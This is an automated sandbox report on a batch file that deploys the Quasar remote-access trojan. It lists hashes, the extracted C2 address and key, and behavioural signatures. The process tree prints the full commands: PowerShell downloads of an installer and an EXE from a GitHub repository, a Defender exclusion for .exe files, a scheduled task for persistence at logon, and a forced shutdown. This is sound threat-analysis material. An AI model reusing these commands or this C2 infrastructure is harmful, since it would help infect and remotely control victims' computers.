Analysis
-
max time kernel
49s -
max time network
50s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
22-11-2024 00:48
Static task
static1
Behavioral task
behavioral1
Sample
main1.bat
Resource
win7-20240903-en
Errors
General
-
Target
main1.bat
-
Size
15KB
-
MD5
837e6e693eab2459822a681dd8829347
-
SHA1
77417d665e66ae2f962f52b3d7c916f0772f0615
-
SHA256
57970a3c842bcaf6860a9d271b2725b08fc07a50ca18ff852983d8e80905a0c7
-
SHA512
54f3d0f4a69d785dd6012f5376d131f3d4cdfa1885577c46468bf1e37aed1d7da86cc11b7efcddf53eede8a4803a16e14c008493404906e3b870ccd441278a48
-
SSDEEP
384:wK1+KSlKC8kumFq/vM2pHz6YBM3P6QDSJO4ytvJ2/N2cGTuEhckk7VgFHbWvaPn0:wK1+KSlKC8++vM23b+CJXPn
Malware Config
Extracted
quasar
1.4.1
bot
wooting2000-47095.portmap.host:47095
2e05f1ef-743b-4020-b18a-7f4276517e8b
-
encryption_key
E83D6FC31962786DAEA703F111D2381786DF06CA
-
install_name
Modification1.5.14.12.exe
-
log_directory
Logs
-
reconnect_delay
3126
-
startup_key
explorer.dll
-
subdirectory
SubDir
Signatures
-
Quasar family
-
Quasar payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Modification11910275.exe family_quasar behavioral2/memory/2512-49-0x00000000006C0000-0x00000000009E4000-memory.dmp family_quasar -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 7 3596 powershell.exe 18 3016 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepid process 3596 powershell.exe 3016 powershell.exe 4532 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Modification1.5.14.12.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation Modification1.5.14.12.exe -
Executes dropped EXE 2 IoCs
Processes:
Modification11910275.exeModification1.5.14.12.exepid process 2512 Modification11910275.exe 4888 Modification1.5.14.12.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 18 raw.githubusercontent.com 6 raw.githubusercontent.com 7 raw.githubusercontent.com -
Drops file in System32 directory 5 IoCs
Processes:
Modification11910275.exeModification1.5.14.12.exedescription ioc process File created C:\Windows\system32\SubDir\Modification1.5.14.12.exe Modification11910275.exe File opened for modification C:\Windows\system32\SubDir\Modification1.5.14.12.exe Modification11910275.exe File opened for modification C:\Windows\system32\SubDir Modification11910275.exe File opened for modification C:\Windows\system32\SubDir\Modification1.5.14.12.exe Modification1.5.14.12.exe File opened for modification C:\Windows\system32\SubDir Modification1.5.14.12.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 15 IoCs
Processes:
LogonUI.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "194" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 2620 schtasks.exe 4100 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 3596 powershell.exe 3596 powershell.exe 4532 powershell.exe 4532 powershell.exe 3016 powershell.exe 3016 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exepowershell.exeModification11910275.exeModification1.5.14.12.exeshutdown.exedescription pid process Token: SeDebugPrivilege 3596 powershell.exe Token: SeDebugPrivilege 4532 powershell.exe Token: SeDebugPrivilege 3016 powershell.exe Token: SeDebugPrivilege 2512 Modification11910275.exe Token: SeDebugPrivilege 4888 Modification1.5.14.12.exe Token: SeShutdownPrivilege 4780 shutdown.exe Token: SeRemoteShutdownPrivilege 4780 shutdown.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
Modification1.5.14.12.exeLogonUI.exepid process 4888 Modification1.5.14.12.exe 628 LogonUI.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
cmd.execmd.exeModification11910275.exeModification1.5.14.12.exedescription pid process target process PID 632 wrote to memory of 3596 632 cmd.exe powershell.exe PID 632 wrote to memory of 3596 632 cmd.exe powershell.exe PID 632 wrote to memory of 3900 632 cmd.exe cmd.exe PID 632 wrote to memory of 3900 632 cmd.exe cmd.exe PID 3900 wrote to memory of 2904 3900 cmd.exe cacls.exe PID 3900 wrote to memory of 2904 3900 cmd.exe cacls.exe PID 3900 wrote to memory of 4532 3900 cmd.exe powershell.exe PID 3900 wrote to memory of 4532 3900 cmd.exe powershell.exe PID 3900 wrote to memory of 3016 3900 cmd.exe powershell.exe PID 3900 wrote to memory of 3016 3900 cmd.exe powershell.exe PID 3900 wrote to memory of 2512 3900 cmd.exe Modification11910275.exe PID 3900 wrote to memory of 2512 3900 cmd.exe Modification11910275.exe PID 2512 wrote to memory of 2620 2512 Modification11910275.exe schtasks.exe PID 2512 wrote to memory of 2620 2512 Modification11910275.exe schtasks.exe PID 2512 wrote to memory of 4888 2512 Modification11910275.exe Modification1.5.14.12.exe PID 2512 wrote to memory of 4888 2512 Modification11910275.exe Modification1.5.14.12.exe PID 4888 wrote to memory of 4100 4888 Modification1.5.14.12.exe schtasks.exe PID 4888 wrote to memory of 4100 4888 Modification1.5.14.12.exe schtasks.exe PID 4888 wrote to memory of 4780 4888 Modification1.5.14.12.exe shutdown.exe PID 4888 wrote to memory of 4780 4888 Modification1.5.14.12.exe shutdown.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\main1.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:632 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/walks111551/09672018256120856125/main/installer.bat' -OutFile installer.bat"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3596
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K installer.bat2⤵
- Suspicious use of WriteProcessMemory
PID:3900 -
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"3⤵PID:2904
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Set-MpPreference -ExclusionExtension exe"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/walks111551/09672018256120856125/main/Modification11910275.exe' -OutFile Modification11910275.exe"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3016
-
-
C:\Users\Admin\AppData\Local\Temp\Modification11910275.exeModification11910275.exe3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "explorer.dll" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Modification1.5.14.12.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:2620
-
-
C:\Windows\system32\SubDir\Modification1.5.14.12.exe"C:\Windows\system32\SubDir\Modification1.5.14.12.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4888 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "explorer.dll" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Modification1.5.14.12.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:4100
-
-
C:\Windows\System32\shutdown.exe"C:\Windows\System32\shutdown.exe" /s /t 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:4780
-
-
-
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa38cc855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:628
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD5a5c074e56305e761d7cbc42993300e1c
SHA139b2e23ba5c56b4f332b3607df056d8df23555bf
SHA256e75b17396d67c1520afbde5ecf8b0ccda65f7833c2e7e76e3fddbbb69235d953
SHA512c63d298fc3ab096d9baff606642b4a9c98a707150192191f4a6c5feb81a907495b384760d11cecbff904c486328072548ac76884f14c032c0c1ae0ca640cb5e8
-
Filesize
944B
MD5692a440f9cfbeaf648632aead685a5a1
SHA1e4e4bd8405be77294f4be5ea18b5e05b139f35af
SHA2563e1615e7774bd98860c984570515c293b64cf07f1b8e6688a72e78fa9ebed0f4
SHA512c7501a0fc978d0f06f32c4a205246763796a20c0b2514f00cb6676c8c95ab38d463b87c2973ca2b9b3e2fee3bc7ded869f5896c498303397167c4b5f069db519
-
Filesize
3.1MB
MD5fa9b1524e725c4a251d07007f15fa947
SHA15c023619d8180b611acb544fa1cd8bd31de9e61c
SHA2560cbcab350f25f5764dc967cf6f764eccdd094b1f8ca14d60a731713ace6b1aec
SHA512dac63f0970092186a909dafeb75cee3e1ad3b393984cf78a1d88e339a39ef235567f74b7a874b237762b8a46e74f8cb319add4bcbc4bdf8f76ec8e1476fb44db
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
996B
MD59573128d5eac791a88ae169d4941e267
SHA15bbcbca4753c6c2e145ac68712c3eb68eb1512f3
SHA2561562ce54110ea27bad805f00f40e9bf78322dde78d4f900deee7e4cce17a70dd
SHA512d2fd5846cebf28ee3b159f9743fa63d4bec31ccdb2a431305b8a80b8cbcbfddb50e9d29374d4bc381ac46a1e399fb703af5c38f83834949256d57968817e7522